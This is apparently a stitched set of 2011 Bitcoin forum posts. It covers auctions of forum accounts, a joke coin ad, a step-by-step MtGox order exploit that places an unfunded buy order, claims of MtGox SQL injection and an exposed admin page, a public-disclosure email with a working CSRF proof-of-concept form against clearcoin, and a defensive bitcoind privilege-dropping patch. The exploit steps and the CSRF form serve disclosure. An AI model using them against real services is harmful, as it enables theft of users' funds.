Senior Member Auction
Quality Posts, No Negative Feedback, Not Blacklisted by Smas, No Loans

Starting Bid: $120
Bidding Increments: $10

Buy it now: $150

Escrow if you don't send first.

Senior Member = $150
Full Member = $70
Member = $35
Junior Member = $15

Quality Posts, No negative feedback, No loans, No staked address, With Original Email

Big discounts for bulk orders.

Escrow via Bitify.com.

You are bidding for 5 junior members.

5 junior members have quality posts, no negative feedback, not hacked, no loans and original email included.

Starting bid: 0.01 btc
Bidding Increments: 0.001 btc

Buy it now: 0.015 btc

Escrow via bitify.com

Bitcoins are so 2010. Entrust your crypto currency to the only man deserving of your trust: The Cos.

http://cosbycoin.com

On this momentus anniversary cosbycoin is dedicated displaying a proper tribute to the victims of loss of life, liberty, and the pursuit of happiness. Namely, that the terrorists won.

Step 1: Have USD available for spending on mtgox.com.
Step 2: Put in a buy order large enough to drain your account. Low enough under the current trading price that it will not execute immediately.
Step 3: Withdraw all USD funds.
Step 4: Wait for market to fall enough to meet your order.
Step 5: ...(self explanatory)...

There's a bit of luck in being able to take advantage, obviously.

I would suggest you take the site down asap until this is corrected or publicly show how this order will never execute:

==========
Welcome <username removed> 0.00000000 ฿TC 424.44901
Buying  138468.901  0.01  Active  1384.69  06/26 15:27  cancel
==========

I cannot guarantee this order will execute but from everything I've observed about the new trade matching code I have no reason to believe it will not.

At the very least this could be used to influence market conditions if it is only a display bug.

bitcoin-dev: http://sourceforge.net/mailarchive/forum.php?thread_name=C9421AA2-D741-4989-9DA8-395D1F532F52%40jrbobdobbs.org&forum_name=bitcoin-development
f-d: http://lists.grok.org.uk/pipermail/full-disclosure/2011-June/081682.html

More full disclosure! More fun!

I have two independent sources claiming known SQLi vulnerabilities in MtGox.

One of said SQLi vulnerabilties was confirmed to be patched on the 16th.
The other was not patched, to anyone's knowledge, at the time of the market crash and database leak. The one that was not patched could have plausibly been used to dump the user table.

The details follow in these chat logs. POC for the referenced xss+csrf is also provided. Whether or not it is still an issue is not known for sure at this time as the site cannot be accessed.

It has also been found that MtGox exposes it's admin user interface even if a user does not have the admin flag set on their account. As of now it is thought that most actions attempted to be used will throw permission errors. Once again. This cannot be confirmed at this time. https://mtgox.com/app/webroot/code/admin

MagicalTux, now that your claim "The site was not compromised with a SQL injection as many are reporting, so in effect the site was not hacked." Please respond. The truth this time.

MagicalTux's official response at the time of this writing is also attached. It is available at:
https://support.mtgox.com/entries/20208066-huge-bitcoin-sell-off-due-to-a-compromised-account-rollback

These logs are not modified except for user's hostmasks at their request due to MagicalTux's new found policy of committing libel against his users based on login logs, since he apparently doesn't keep order book logs for orders that go through immediately, by his own admission. Classy.

Mirrors:
http://privatepaste.com/93e8a9cd64 (#bitcoin-hax log)
http://privatepaste.com/47a50cab5b (sig)
http://www.mediafire.com/?m7o4z3oz9nyd3v3 (#bitcoin-hax log)
http://www.mediafire.com/?nzcpa5mwpw9ccbb (sig)
http://privatepaste.com/e4bacfae37 (PovAddict log)
http://privatepaste.com/9dc5daf8a0 (sig)
http://www.mediafire.com/?bflr76anvv835ib (PovAddict log)
http://www.mediafire.com/?rl250c2dahw7dx9 (sig)
http://privatepaste.com/6dad3927d6 (XSS + CSRF)
http://privatepaste.com/45e5aa0d30 (sig)
http://www.mediafire.com/?synt5sjcbkl9zvq (XSS + CSRF)
http://www.mediafire.com/?uv7be34198pseoo (sig)

f-d: http://lists.grok.org.uk/pipermail/full-disclosure/2011-June/081582.html
Message is awaiting approval on bitcoin-list and bitcoin-development lists.

Edit: sourceforge list link (attachment-less reply)
http://sourceforge.net/mailarchive/forum.php?thread_name=D091767C-EF92-4B63-9C29-924F32AE34D7%40jrbobdobbs.org&forum_name=bitcoin-development

Code:

From: Doug Huff <dhuff@jrbobdobbs.org>
Content-Type: multipart/signed; protocol="application/pgp-signature";
	micalg=pgp-sha1; boundary="Apple-Mail-2--499212877"
X-Smtp-Server: smtp.gmail.com:mith@jrbobdobbs.org
Subject: Bitcoin fun day!
Date: Sun, 19 Jun 2011 16:54:28 -0500
X-Universally-Unique-Identifier: 52968483-4027-4d0b-9145-dc72230ee50c
Message-Id: <2B2201C1-E59F-47D4-BF67-08FDB0DDE386@jrbobdobbs.org>
Cc: Bitcoin Dev <bitcoin-development@lists.sourceforge.net>
To: full-disclosure@lists.grok.org.uk
Mime-Version: 1.0 (Apple Message framework v1084)
Content-Transfer-Encoding: 7bit
X-Pgp-Agent: GPGMail 1.3.3

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--Apple-Mail-2--499212877
Content-Type: multipart/signed; boundary=Apple-Mail-1--499212884; protocol="application/pkcs7-signature"; micalg=sha1


--Apple-Mail-1--499212884
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
	charset=us-ascii

In light of recent events in the "bitcoin community" I have decided that =
private disclosure of issues is doing nothing but making them more =
prevalent.

In light of this decision I would like to report multiple CSRF =
vulnerabilities in http://clearcoin.appspot.com .

This set of CSRFs are particularly nasty since this is hosted on appspot =
and uses google account auth. So long as you stay logged into your =
google account you are vulnerable to this CSRF.

Things tested:
  Changing refund address.
  Releasing funds.

POC code (open this in any browser even from a local file):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
<html><head><title>test</title></head>
  <body>
  <form id=3D"refund_address_form" =
action=3D"https://clearcoin.appspot.com/set_refund_address" =
method=3D"POST">=20
      <label for=3D"refund_address">Your bitcoin address:</label>=20
      <input type=3D"text" name=3D"refund_address" id=3D"refund_address" =
size=3D"60" value=3D"PUT ANY ADDRESS HERE"
             class=3D"text ui-widget-content ui-corner-all" autofocus =
required placeholder=3D"refund bitcoin address"/> (required)
  </form>=20
  </body>
</html>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Javascript auto submittal, hiding in an iframe, and other obfuscation =
methods are left as an exercise to the list.

This site is run and maintained by Gavin Anderson, aka, the lead bitcoin =
maintainer.

You should know better Gavin.

--=20
Douglas Huff



--Apple-Mail-1--499212884
Content-Disposition: attachment;
	filename=smime.p7s
Content-Type: application/pkcs7-signature;
	name=smime.p7s
Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIKXDCCBN0w
ggPFoAMCAQICEHGS++YZX6xNEoV0cTSiGKcwDQYJKoZIhvcNAQEFBQAwezELMAkGA1UEBhMCR0Ix
GzAZBgNVBAgMEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBwwHU2FsZm9yZDEaMBgGA1UECgwR
Q29tb2RvIENBIExpbWl0ZWQxITAfBgNVBAMMGEFBQSBDZXJ0aWZpY2F0ZSBTZXJ2aWNlczAeFw0w
NDAxMDEwMDAwMDBaFw0yODEyMzEyMzU5NTlaMIGuMQswCQYDVQQGEwJVUzELMAkGA1UECBMCVVQx
FzAVBgNVBAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsx
ITAfBgNVBAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMtVVROLVVTRVJGaXJz
dC1DbGllbnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
MIIBCgKCAQEAsjmFpPJ9q0E7YkY3rs3BYHW8OWX5ShpHornMSMxqmNVNNRm5pELlzkniii8efNIx
B8dOtINknS4p1aJkxIW9hVE1eaROaJB7HHqkkqgX8pgV8pPMyaQylbsMTzC9mKALi+VuG6JG+ni8
om+rWV6lL8/K2m2qL+usobNqqrcuZzWLeeEeaYji5kbNoKXqvgvOdjp6Dpvq/NonWz1zHyLmSGHG
TPNpsaguG7bUMSAsvIKKjqQOpdeJQ/wWWq8dcdcRWdq6hw2v+vPhwvCkxWeM1tZUOt4KpLoDd7Nl
yP0e03RiqhjKaJMeoYV+9Udly/hNVyh00jT/MLbu9mIwFIws6wIDAQABo4IBJzCCASMwHwYDVR0j
BBgwFoAUoBEKIz6W8Qfs4q8p74Klf9AwpLQwHQYDVR0OBBYEFImCZ33EnSZwAEu0UEh83j2uBG59
MA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdJQQWMBQGCCsGAQUFBwMCBggr
BgEFBQcDBDARBgNVHSAECjAIMAYGBFUdIAAwewYDVR0fBHQwcjA4oDagNIYyaHR0cDovL2NybC5j
b21vZG9jYS5jb20vQUFBQ2VydGlmaWNhdGVTZXJ2aWNlcy5jcmwwNqA0oDKGMGh0dHA6Ly9jcmwu
Y29tb2RvLm5ldC9BQUFDZXJ0aWZpY2F0ZVNlcnZpY2VzLmNybDARBglghkgBhvhCAQEEBAMCAQYw
DQYJKoZIhvcNAQEFBQADggEBAJ2Vyzy4fqUJxB6/C8LHdo45PJTGEKpPDMngq4RdiVTgZTvzbRx8
NywlVF+WIfw3hJGdFdwUT4HPVB1rbEVgxy35l1FM+WbKPKCCjKbI8OLp1Er57D9Wyd12jMOCAU9s
APMeGmF0BEcDqcZAV5G8ZSLFJ2dPV9tkWtmNH7qGL/QGrpxp7en0zykX2OBKnxogL5dMUbtGB8SK
N04g4wkxaMeexIud6H4RvDJoEJYRmETYKlFgTYjrdDrfQwYyyDlWjDoRUtNBpEMD9O3vMyfbOeAU
TibJ2PU54om4k123KSZB6rObroP8d3XK6Mq1/uJlSmM+RMTQw16Hc6mYHK9/FX8wggV3MIIEX6AD
AgECAhEA3puo39RJhNVx/ssfdXafbjANBgkqhkiG9w0BAQUFADCBrjELMAkGA1UEBhMCVVMxCzAJ
BgNVBAgTAlVUMRcwFQYDVQQHEw5TYWx0IExha2UgQ2l0eTEeMBwGA1UEChMVVGhlIFVTRVJUUlVT
VCBOZXR3b3JrMSEwHwYDVQQLExhodHRwOi8vd3d3LnVzZXJ0cnVzdC5jb20xNjA0BgNVBAMTLVVU
Ti1VU0VSRmlyc3QtQ2xpZW50IEF1dGhlbnRpY2F0aW9uIGFuZCBFbWFpbDAeFw0xMTA1MDEwMDAw
MDBaFw0xMjA0MzAyMzU5NTlaMCUxIzAhBgkqhkiG9w0BCQEWFGRodWZmQGpyYm9iZG9iYnMub3Jn
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3ZPhVmPPoaj999EiZAp6e/giHUrh0Pq2
/LjCFtVgP7clqtoStYyz7i9LojgmRqKu6cswpltUICp+rRskK6ISYRYkNf9w587D2xtqHVVjmoH8
afW/B0db4v+wC7wjzh+hFlXZ3q7sZApMqsFgAS3mdF+iEe5nNt9kGD7OhNlVimvNqcpIhJhRBhpW
7vi7/Rt8uVciDOYVARJq7Tb1zZe88wTFkVri075/nFYfikCgU3GccxvcnR9QwC7xoyGFtE/z8qjv
1h1Tn+eS7eEYQveQxMFNnEPHfoihpiSQpQUzEAJK96dwj8ED2CXtNpV6pQ9PCu2HWjXIVpZj+YNN
eOSRbwIDAQABo4ICFjCCAhIwHwYDVR0jBBgwFoAUiYJnfcSdJnAAS7RQSHzePa4Ebn0wHQYDVR0O
BBYEFGBmA3ruGdgBmCodBzi9QrRBvjz/MA4GA1UdDwEB/wQEAwIFoDAMBgNVHRMBAf8EAjAAMCAG
A1UdJQQZMBcGCCsGAQUFBwMEBgsrBgEEAbIxAQMFAjARBglghkgBhvhCAQEEBAMCBSAwRgYDVR0g
BD8wPTA7BgwrBgEEAbIxAQIBAQEwKzApBggrBgEFBQcCARYdaHR0cHM6Ly9zZWN1cmUuY29tb2Rv
Lm5ldC9DUFMwgaUGA1UdHwSBnTCBmjBMoEqgSIZGaHR0cDovL2NybC5jb21vZG9jYS5jb20vVVRO
LVVTRVJGaXJzdC1DbGllbnRBdXRoZW50aWNhdGlvbmFuZEVtYWlsLmNybDBKoEigRoZEaHR0cDov
L2NybC5jb21vZG8ubmV0L1VUTi1VU0VSRmlyc3QtQ2xpZW50QXV0aGVudGljYXRpb25hbmRFbWFp
bC5jcmwwbAYIKwYBBQUHAQEEYDBeMDYGCCsGAQUFBzAChipodHRwOi8vY3J0LmNvbW9kb2NhLmNv
bS9VVE5BQUFDbGllbnRDQS5jcnQwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmNvbW9kb2NhLmNv
bTAfBgNVHREEGDAWgRRkaHVmZkBqcmJvYmRvYmJzLm9yZzANBgkqhkiG9w0BAQUFAAOCAQEAj/Ck
hfsc3p7aoCSIMGOTVBzBjJBtCwWTUF1d/pnJ7ynWCiEOypIGGe0im5+Y1WH8+fVNgIwlifRSoZ1R
oloxXRuqiraKCevG5OC41Evkp67HmrrhlerLxUvoKLg7sDWfYtmQ24whfYEsd3Fm2u6KxoXboyyb
fdDhl5BLhWy+5kHHlIaoZjUoHHXOMuOZdhreIcJI54+wehddzwtdrhF0h2KUTm3tvA0e2kTX4Kzz
3JWIzFSsCmTdTx2UdiOBJmWZ8dgdskOSKRYByvSBT+/BsbF+JbJcjCHqDiEmmXQeTNuRDYeCPfkq
/HRSrEZMi/RORls1HSA79IOXjvj8RkAKyDGCA/8wggP7AgEBMIHEMIGuMQswCQYDVQQGEwJVUzEL
MAkGA1UECBMCVVQxFzAVBgNVBAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRS
VVNUIE5ldHdvcmsxITAfBgNVBAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMt
VVROLVVTRVJGaXJzdC1DbGllbnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsAhEA3puo39RJhNVx
/ssfdXafbjAJBgUrDgMCGgUAoIICDzAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3
DQEJBTEPFw0xMTA2MTkyMTU0MjlaMCMGCSqGSIb3DQEJBDEWBBRTgeJlgs0yICFYnbqMVlsvFVdx
jTCB1QYJKwYBBAGCNxAEMYHHMIHEMIGuMQswCQYDVQQGEwJVUzELMAkGA1UECBMCVVQxFzAVBgNV
BAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxITAfBgNV
BAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMtVVROLVVTRVJGaXJzdC1DbGll
bnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsAhEA3puo39RJhNVx/ssfdXafbjCB1wYLKoZIhvcN
AQkQAgsxgceggcQwga4xCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJVVDEXMBUGA1UEBxMOU2FsdCBM
YWtlIENpdHkxHjAcBgNVBAoTFVRoZSBVU0VSVFJVU1QgTmV0d29yazEhMB8GA1UECxMYaHR0cDov
L3d3dy51c2VydHJ1c3QuY29tMTYwNAYDVQQDEy1VVE4tVVNFUkZpcnN0LUNsaWVudCBBdXRoZW50
aWNhdGlvbiBhbmQgRW1haWwCEQDem6jf1EmE1XH+yx91dp9uMA0GCSqGSIb3DQEBAQUABIIBAIa0
nEwugdoy0co/xZSmSF2FL3Q2I1QjrcwOP2svW7D6yUXl2e9xZdvxPehdGg51UJGtGDDzc5vnT5DW
HWpskxWyBbwYHEM4g+Tuix0pCey7twTJ51tv4uCZljUzfNc1IrctezhdNmFJQfKIrN+Yq6b81Qnt
zmK0pq+va+WVMBez9CnojZaijViQD8agyCWouZhQRPwFE7iTaARwtcuoHpN34TqvNfGpeSOAwi13
6LpFDlN9zzyVeRLgwqbiRQnd2KCzv7yWI+OlzK4bgVB5TPclErhTUvb+rAtAlZM7cDf5uFzsMk1d
/ui76BOfwXTFRAZsmyKQRjz6NeTNKuOuNtkAAAAAAAA=

--Apple-Mail-1--499212884--

--Apple-Mail-2--499212877
content-type: application/pgp-signature; x-mac-type=70674453;
	name=PGP.sig
content-description: This is a digitally signed message part
content-disposition: inline; filename=PGP.sig
content-transfer-encoding: 7bit

-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org

iQIcBAEBAgAGBQJN/nAVAAoJEEPHkQabDWHPBRUP/RqNgPYEjbzKLNOktnBr1Ec0
VC1k+z6dFoX8FiH4lciF+CFBPHuQ6fsbR9tbVLFVSWmym1F33KVy/7dzsIWbCfGf
Q255aHrFQsVFPejxmgzRRLhZ8D19vxp3l69ALMe3QKhVdfdfjykVZwnoeeUx7GnJ
kcrcM9VWISp+Lr9Yc/HgsnerDPomAYEmiH4ur/CS6vC2PKayVoAbwh4Cr+5UyBUP
/AdYXCRhF1Mci0K3mg3boG8FQkGn+zJJ7s3TB2FMZvK43lSzS1+f2GTfbBZRPVbq
1hyijFZJx/4P4fX6kOICudU/5/8i9X0qgRoqenXf7kJVH4+e29JCXJNOMXMMrMZN
au3H6mq6KvmZKMnxZIs4e8G1NIWzO6oOQD7BhUE8A11IlaiNiUYvT+Z1PrV3lfwP
PgSUnQo3FmH4dPT+fNydQusN/sLMKdrCzRLUAj6o0ZlAu2nvzHU+spDmDluzwdNo
QW7BNdgcpEUVozgFx/gxi0eXUjOfxS120uyCwLbEFWbUqwmmpxMlACpliOU439P3
p4uXpISVIOLmRY2pL2mFx9PEzAc5z4Q4+g+HTZtp9cy5fJ7htZSKItuSbciLNlcS
htX8F/g+Ap0W9Lnd+nnVXxZ8YxOufBvfptU9TSIaVq7uhIphluFiF+nMwqjg4PWE
BNbnmnNAmUKC7+bLjSzx
=e0ef
-----END PGP SIGNATURE-----

http://sourceforge.net/mailarchive/forum.php?thread_name=2B2201C1-E59F-47D4-BF67-08FDB0DDE386%40jrbobdobbs.org&forum_name=bitcoin-development

Sorry Gavin.

(Gavin has already pulled clearcoin offline to address the issue.)

Edit: Adding f-d link for posterity.
http://lists.grok.org.uk/pipermail/full-disclosure/2011-June/081574.html

[this process]

I was asked to create a forum thread so here it is.

In Linux 2.6.32+ the linux kernel had some fun changes to the posix1.e implementation in regards to how the CAP_SETPCAP capability is interpreted by the system and the addition of filesystem meta data support to enable capabilities instead of just blanket suid/sgid binaries.

This patch arose out of discussions in #bitcoin-dev.

Various proposed wallet encryption methods were being discussed at the time by BlueMatt and a few others. The (straw man) argument was proposed that if an attacker were able to get root on the machine any of the proposed methods would be completely compromised. (Re: decode on launch vs decode on txn creation, let's not rehash this discussion here as it is outside of the scope of this patch.)

This is merely one method of mitigating such risks through bitcoind itself. By clearing the bounding set and setting these flags in PR_SET_SECUREBITS the kernel will not let this process ever gain escalated privs. This means that even if, say, an attack vector which allowed for remote execution in bitcoin was found, and let's say the system it is running on has some zero-day exploit in an suid binary. (or a lazy admin, not that I endorse this) Even if the code was executed, the kernel would ignore the setuid flags on the binary and it would still run as whatever user bitcoind was launched at.

The patch as implemented is fairly straight forward.

As written, even if enabled, this patch does absolutely nothing unless the process when launched has the CAP_SETPCAP capability. There are 3 (simple, there are a few others) ways for the process to be created in this way:

1) Launch bitcoind as root. HORRIBLE
2) Set bitcoind setuid root. HORRIBLE
3) Use the setcap utility to: setcap cap_setpcap=eip bitcoind; AWESOME

The only recommended method is the last. This capability is required in order to modify the bounding set of yourself. Please note that if you read older documentation this capability sounds scarier than it is pre-2.6.32 and file metadata capability support this capability would let you modify the capabilities of any process on the machine. This is not the case in 2.6.32+.

Side effects/regressions:

With this option built if bitcoind is launched as root to say, bind to a port <1024 it will no longer be able to do this as this patch completely removes the special meaning of uid 0 in the running process and all children/threads.

This patch does not enable this functionality in the bitcoin gui client. I am not sure if that is worth pursuing; but, I am just not familiar with wxWidgets and did not want to stick it in the "wrong" place.

Pull request:

https://github.com/bitcoin/bitcoin/pull/202